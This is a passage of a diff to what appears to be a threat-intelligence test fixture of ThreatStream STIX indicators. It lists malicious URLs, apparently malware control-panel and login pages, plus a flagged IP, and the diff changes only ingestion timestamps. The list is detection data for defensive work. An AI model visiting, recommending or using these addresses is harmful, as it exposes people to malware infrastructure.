"2021-12-13T08:38:40.024432500Z", + "ingested": "2021-12-14T14:57:43.118302024Z", "original": "{\"created\":\"2020-02-05T01:58:32.145Z\",\"description\":\"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--69661075-e6cb-4054-820c-61954757f0ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:58:32.145Z\",\"name\":\"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.145Z\"}", "category": "threat", "type": "indicator", 
@@ -16168,7 +16168,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024439500Z", + "ingested": "2021-12-14T14:57:43.118302515Z", "original": "{\"created\":\"2020-02-05T01:58:34.795Z\",\"description\":\"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.795Z\",\"name\":\"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.795Z\"}", "category": "threat", "type": "indicator", @@ -16219,7 +16219,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024446500Z", + "ingested": "2021-12-14T14:57:43.118302948Z", "original": "{\"created\":\"2020-02-05T01:58:34.836Z\",\"description\":\"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.836Z\",\"name\":\"mal_url: http://domainmanagerz.net/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://domainmanagerz.net/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.836Z\"}", "category": "threat", "type": "indicator", 
@@ -16271,7 +16271,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024453400Z", + "ingested": "2021-12-14T14:57:43.118303341Z", "original": "{\"created\":\"2020-02-05T01:58:41.381Z\",\"description\":\"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:58:41.381Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:41.381Z\"}", "category": "threat", "type": "indicator", @@ -16323,7 +16323,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024460500Z", + "ingested": "2021-12-14T14:57:43.118303881Z", "original": "{\"created\":\"2020-02-05T01:58:59.279Z\",\"description\":\"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--b845a78e-d141-455e-92ff-df401787a3cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:59.279Z\",\"name\":\"mal_url: http://samundarmarine.com/denty/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samundarmarine.com/denty/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:59.279Z\"}", "category": "threat", "type": "indicator", 
@@ -16375,7 +16375,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024467500Z", + "ingested": "2021-12-14T14:57:43.118304370Z", "original": "{\"created\":\"2020-02-05T01:59:03.426Z\",\"description\":\"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:59:03.426Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p4/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:03.426Z\"}", "category": "threat", "type": "indicator", @@ -16420,7 +16420,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024476500Z", + "ingested": "2021-12-14T14:57:43.118304770Z", "original": "{\"created\":\"2020-02-05T01:59:04.695Z\",\"description\":\"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--57e76166-d475-4027-b2d9-b4910c5b0747\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-05T01:59:04.695Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:04.695Z\"}", "category": "threat", "type": "indicator", 
@@ -16472,7 +16472,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024483300Z", + "ingested": "2021-12-14T14:57:43.118305227Z", "original": "{\"created\":\"2020-02-05T01:59:06.271Z\",\"description\":\"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-05T01:59:06.271Z\",\"name\":\"mal_url: http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:06.271Z\"}", "category": "threat", "type": "indicator", @@ -16524,7 +16524,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024486700Z", + "ingested": "2021-12-14T14:57:43.118305759Z", "original": "{\"created\":\"2020-02-05T01:59:24.611Z\",\"description\":\"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-05T01:59:24.611Z\",\"name\":\"mal_url: http://ipblasta.com/kmaker/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ipblasta.com/kmaker/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:24.611Z\"}", "category": "threat", "type": "indicator", 
@@ -16576,7 +16576,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024491700Z", + "ingested": "2021-12-14T14:57:43.118306149Z", "original": "{\"created\":\"2020-02-05T01:59:31.341Z\",\"description\":\"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-05T01:59:31.341Z\",\"name\":\"mal_url: http://softtouchcollars.com/origin/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/origin/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:31.341Z\"}", "category": "threat", "type": "indicator", @@ -16621,7 +16621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024497400Z", + "ingested": "2021-12-14T14:57:43.118306543Z", "original": "{\"created\":\"2020-02-05T01:59:47.461Z\",\"description\":\"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-05T01:59:47.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.461Z\"}", "category": "threat", "type": "indicator", 
@@ -16666,7 +16666,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024503600Z", + "ingested": "2021-12-14T14:57:43.118307131Z", "original": "{\"created\":\"2020-02-05T01:59:47.506Z\",\"description\":\"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:59:47.506Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.506Z\"}", "category": "threat", "type": "indicator", @@ -16718,7 +16718,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024507400Z", + "ingested": "2021-12-14T14:57:43.118307594Z", "original": "{\"created\":\"2020-02-05T02:00:16.19Z\",\"description\":\"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-05T02:00:16.19Z\",\"name\":\"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:16.19Z\"}", "category": "threat", "type": "indicator", 
@@ -16770,7 +16770,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024512600Z", + "ingested": "2021-12-14T14:57:43.118308040Z", "original": "{\"created\":\"2020-02-05T02:00:23.009Z\",\"description\":\"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-05T02:00:23.009Z\",\"name\":\"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:23.009Z\"}", "category": "threat", "type": "indicator", @@ -16822,7 +16822,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024535600Z", + "ingested": "2021-12-14T14:57:43.118308496Z", "original": "{\"created\":\"2020-02-05T02:00:29.679Z\",\"description\":\"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:00:29.679Z\",\"name\":\"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:29.679Z\"}", "category": "threat", "type": "indicator", 
@@ -16874,7 +16874,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024540Z", + "ingested": "2021-12-14T14:57:43.118309051Z", "original": "{\"created\":\"2020-02-05T02:00:52.297Z\",\"description\":\"TS ID: 55287965570; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--b4e748c7-0beb-4b0f-a234-938ad9a6b884\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-05T02:00:52.297Z\",\"name\":\"mal_url: http://futuracosmetic.com/frank/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://futuracosmetic.com/frank/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:52.297Z\"}", "category": "threat", "type": "indicator", @@ -16926,7 +16926,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024544400Z", + "ingested": "2021-12-14T14:57:43.118309506Z", "original": "{\"created\":\"2020-02-05T02:00:57.141Z\",\"description\":\"TS ID: 55287965588; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--320c2f41-7546-4aa7-afef-5188df844448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:00:57.141Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/tel/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/tel/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.141Z\"}", "category": "threat", "type": "indicator", 
@@ -16978,7 +16978,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024550Z", + "ingested": "2021-12-14T14:57:43.118310010Z", "original": "{\"created\":\"2020-02-05T02:00:57.172Z\",\"description\":\"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-05T02:00:57.172Z\",\"name\":\"mal_url: http://video-ld.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://video-ld.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.172Z\"}", "category": "threat", "type": "indicator", @@ -17030,7 +17030,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024554800Z", + "ingested": "2021-12-14T14:57:43.118310505Z", "original": "{\"created\":\"2020-02-05T02:00:57.733Z\",\"description\":\"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-05T02:00:57.733Z\",\"name\":\"mal_url: http://nortonlilly.info/emma/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/emma/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.733Z\"}", "category": "threat", "type": "indicator", 
@@ -17082,7 +17082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024561400Z", + "ingested": "2021-12-14T14:57:43.118311062Z", "original": "{\"created\":\"2020-02-05T02:01:03.604Z\",\"description\":\"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--e396f12a-867b-4e91-8796-d042aef55ce3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:01:03.604Z\",\"name\":\"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:03.604Z\"}", "category": "threat", "type": "indicator", @@ -17127,7 +17127,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024568600Z", + "ingested": "2021-12-14T14:57:43.118311488Z", "original": "{\"created\":\"2020-02-05T02:01:16.051Z\",\"description\":\"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:01:16.051Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:16.051Z\"}", "category": "threat", "type": "indicator", 
@@ -17179,7 +17179,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024576Z", + "ingested": "2021-12-14T14:57:43.118311929Z", "original": "{\"created\":\"2020-02-05T02:01:18.261Z\",\"description\":\"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--8dff68c1-1114-4092-9f29-f655f27d2337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.261Z\",\"name\":\"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.261Z\"}", "category": "threat", "type": "indicator", @@ -17231,7 +17231,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024583200Z", + "ingested": "2021-12-14T14:57:43.118312381Z", "original": "{\"created\":\"2020-02-05T02:01:18.285Z\",\"description\":\"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--19636e7d-febc-4ae1-879a-28af129c19b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.285Z\",\"name\":\"mal_url: http://credoaz.com/journals/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://credoaz.com/journals/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.285Z\"}", "category": "threat", "type": "indicator", 
@@ -17283,7 +17283,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024590500Z", + "ingested": "2021-12-14T14:57:43.118312822Z", "original": "{\"created\":\"2020-02-05T02:01:21.73Z\",\"description\":\"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--593225c7-68c8-44db-82bf-2c550931a60c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-05T02:01:21.73Z\",\"name\":\"mal_url: http://bestlogs.myjino.ru/best/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:21.73Z\"}", "category": "threat", "type": "indicator", @@ -17334,7 +17334,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024597500Z", + "ingested": "2021-12-14T14:57:43.118313269Z", "original": "{\"created\":\"2020-02-06T02:10:08.953Z\",\"description\":\"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime\",\"id\":\"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:10:08.953Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:08.953Z\"}", "category": "threat", "type": "indicator", 
@@ -17385,7 +17385,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024636300Z", + "ingested": "2021-12-14T14:57:43.118313706Z", "original": "{\"created\":\"2020-02-06T02:10:15.947Z\",\"description\":\"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--9586420f-3737-47b6-8d58-526f629d66e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:10:15.947Z\",\"name\":\"mal_url: http://justwer.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://justwer.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.947Z\"}", "category": "threat", "type": "indicator", @@ -17430,7 +17430,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024643700Z", + "ingested": "2021-12-14T14:57:43.118314180Z", "original": "{\"created\":\"2020-02-06T02:10:15.988Z\",\"description\":\"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--4d0f3370-af7d-4902-abea-65d9f924458b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-06T02:10:15.988Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.988Z\"}", "category": "threat", "type": "indicator", 
@@ -17482,7 +17482,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024649400Z", + "ingested": "2021-12-14T14:57:43.118314653Z", "original": "{\"created\":\"2020-02-06T02:10:22.051Z\",\"description\":\"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--12dac6fb-e53b-4742-9cc4-da362e880571\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:10:22.051Z\",\"name\":\"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:22.051Z\"}", "category": "threat", "type": "indicator", @@ -17527,7 +17527,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024657100Z", + "ingested": "2021-12-14T14:57:43.118315098Z", "original": "{\"created\":\"2020-02-06T02:10:23.024Z\",\"description\":\"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-06T02:10:23.024Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:23.024Z\"}", "category": "threat", "type": "indicator", 
@@ -17579,7 +17579,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024661100Z", + "ingested": "2021-12-14T14:57:43.118315967Z", "original": "{\"created\":\"2020-02-06T02:10:35.597Z\",\"description\":\"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--524c1a55-264d-4f41-a854-1f0601921675\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-06T02:10:35.597Z\",\"name\":\"mal_url: http://f0378370.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:35.597Z\"}", "category": "threat", "type": "indicator", @@ -17630,7 +17630,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024665700Z", + "ingested": "2021-12-14T14:57:43.118316474Z", "original": "{\"created\":\"2020-02-06T02:10:59.132Z\",\"description\":\"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:10:59.132Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:59.132Z\"}", "category": "threat", "type": "indicator", 
@@ -17681,7 +17681,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024671Z", + "ingested": "2021-12-14T14:57:43.118316917Z", "original": "{\"created\":\"2020-02-06T02:11:08.205Z\",\"description\":\"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6b38040c-6578-43c4-8cec-a426d1079a96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-06T02:11:08.205Z\",\"name\":\"mal_url: http://f0396918.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396918.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:08.205Z\"}", "category": "threat", "type": "indicator", @@ -17733,7 +17733,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024675600Z", + "ingested": "2021-12-14T14:57:43.118317409Z", "original": "{\"created\":\"2020-02-06T02:11:15.653Z\",\"description\":\"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-06T02:11:15.653Z\",\"name\":\"mal_url: 